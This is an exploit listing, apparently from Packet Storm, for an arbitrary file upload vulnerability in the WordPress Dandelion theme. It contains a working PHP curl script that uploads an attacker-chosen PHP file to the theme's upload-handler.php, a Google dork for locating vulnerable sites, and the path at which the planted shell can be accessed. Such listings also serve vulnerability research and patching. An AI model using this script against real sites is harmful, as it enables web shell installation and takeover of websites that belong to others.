WordPress Dandelion Theme Shell Upload

2014-02-07T00:00:00
ID PACKETSTORM:125098
Type packetstorm
Reporter TheBlackMonster
Modified 2014-02-07T00:00:00

Description

                                        
                                            `# Exploit Title: Wordpress Dandelion Themes Arbitry File Upload  
# Google Dork: inurl:/wp-content/themes/dandelion/  
# Date: 31/01/2014  
# Exploit Author: TheBlackMonster (Marouane)  
# Vendor Homepage: http://themeforest.net/item/dandelion-powerful-elegant-wordpress-theme/136628  
# Software Link: Not Available  
# Version: Web Application  
# Tested on: Mozilla, Chrome, Opera -> Windows & Linux  
‪#‎Greetz‬ : PhantomGhost, Deto Beiber, All Moroccan Hackers.  
  
We are Moroccans, we are genuis !  
  
<?php  
$uploadfile="yourfile.php";  
$ch = curl_init("http://127.0.0.1/wp-content/themes/dandelion/functions/upload-handler.php");  
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,  
array('Filedata'=>"@$uploadfile"));  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);  
$postResult = curl_exec($ch);  
curl_close($ch);  
print "$postResult";  
?>  
  
File Access :  
  
http://127.0.0.1/uploads/[years]/[month]/your_shell.php  
  
`